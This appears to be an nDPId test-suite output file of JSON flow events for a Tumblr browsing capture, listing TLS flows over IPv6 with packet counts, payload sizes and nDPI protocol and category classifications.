+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118602,"flow_last_seen":1605292118777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1605292103810,"flow_last_seen":1605292122755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2294,"flow_tot_l4_payload_len":522833,"flow_avg_l4_payload_len":606,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":1288,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605292105197,"flow_last_seen":1605292105378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":19710,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1605292105274,"flow_last_seen":1605292105347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2002","src_port":35892,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":44164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605292105418,"flow_last_seen":1605292122864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1279,"flow_tot_l4_payload_len":9163,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605292122674,"flow_last_seen":1605292122861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":3283,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58616,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::200e","src_port":58618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122874,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1605292121486,"flow_last_seen":1605292122503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":24052,"flow_avg_l4_payload_len":387,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} 